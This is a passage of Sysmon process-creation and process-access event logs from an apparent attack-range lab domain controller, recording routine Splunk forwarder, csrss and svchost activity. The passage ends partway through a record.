{"EventTime":"2020-08-01 05:48:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3406,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:43.591\r\nSourceProcessGUID: {A837DB8D-023B-5F25-0000-001053400500}\r\nSourceProcessId: 4420\r\nSourceThreadId: 4436\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nTargetProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f344c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f2a91|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+19fdb50|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:43.591","SourceProcessGUID":"{A837DB8D-023B-5F25-0000-001053400500}","SourceProcessId":"4420","SourceThreadId":"4436","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","TargetProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","TargetProcessId":"2868","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f344c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f2a91|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+19fdb50|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3407,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:43.644\r\nProcessGuid: {A837DB8D-023B-5F25-0000-001006440500}\r\nProcessId: 1204\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nFileVersion: 8.0.2\r\nDescription: splunkd service\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunkd.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd\" check-transforms-keys\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589\r\nParentProcessGuid: {A837DB8D-023A-5F25-0000-001019300500}\r\nParentProcessId: 4368\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal pre-flight-checks --answer-yes --no-prompt ","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:48:43.644","ProcessGuid":"{A837DB8D-023B-5F25-0000-001006440500}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","FileVersion":"8.0.2","Description":"splunkd service","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunkd.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd\" check-transforms-keys","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589","ParentProcessGuid":"{A837DB8D-023A-5F25-0000-001019300500}","ParentProcessId":"4368","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal pre-flight-checks --answer-yes --no-prompt ","EventReceivedTime":"2020-08-01 05:48:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3408,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:43.638\r\nSourceProcessGUID: {A837DB8D-023A-5F25-0000-001019300500}\r\nSourceProcessId: 4368\r\nSourceThreadId: 3288\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nTargetProcessGUID: {A837DB8D-023B-5F25-0000-001006440500}\r\nTargetProcessId: 1204\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4022c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+403f8|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+404c7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+40fee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+18226|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:43.638","SourceProcessGUID":"{A837DB8D-023A-5F25-0000-001019300500}","SourceProcessId":"4368","SourceThreadId":"3288","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","TargetProcessGUID":"{A837DB8D-023B-5F25-0000-001006440500}","TargetProcessId":"1204","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4022c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+403f8|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+404c7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+40fee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+18226|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3409,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:43.638\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-023B-5F25-0000-001006440500}\r\nTargetProcessId: 1204\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:43.638","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-023B-5F25-0000-001006440500}","TargetProcessId":"1204","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:48:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3410,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:43.638\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:43.638","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3411,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:43.638\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:43.638","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3412,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:43.638\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:43.638","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3413,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:43.638\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:43.638","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3414,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:43.638\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 